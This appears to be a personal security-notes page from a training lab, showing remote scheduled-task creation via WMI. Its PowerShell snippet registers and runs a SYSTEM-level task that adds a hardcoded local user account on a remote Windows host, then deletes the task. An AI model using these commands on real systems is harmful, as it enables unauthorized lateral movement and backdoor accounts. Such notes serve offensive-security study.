Security Memo

Search (Ctrl+K)

SearchSearch

Recent Notes

See 1423 more sorted by tag →

remote scheduled task creation via WMI

created Jan 08, 2024updated Jun 05, 20241 min read

Requirements

  • Ports:
    • 135/TCP, 49152-65535/TCP (RPC)
    • 5985/TCP (WinRM HTTP) or 5986/TCP (WinRM HTTPS)
  • Administrator required

With an existing WMI session:

# creation
$Command = "cmd.exe"
$Args = "/c net user munra22 aSdf1234 /add"
 
$Action = New-ScheduledTaskAction -CimSession $Session -Execute $Command -Argument $Args
Register-ScheduledTask -CimSession $Session -Action $Action -User "NT AUTHORITY\SYSTEM" -TaskName "THMtask2"
 
# starting
Start-ScheduledTask -CimSession $Session -TaskName "THMtask2"
 
# cleanup
Unregister-ScheduledTask -CimSession $Session -TaskName "THMtask2"

Graph View

Backlinks

  • No backlinks found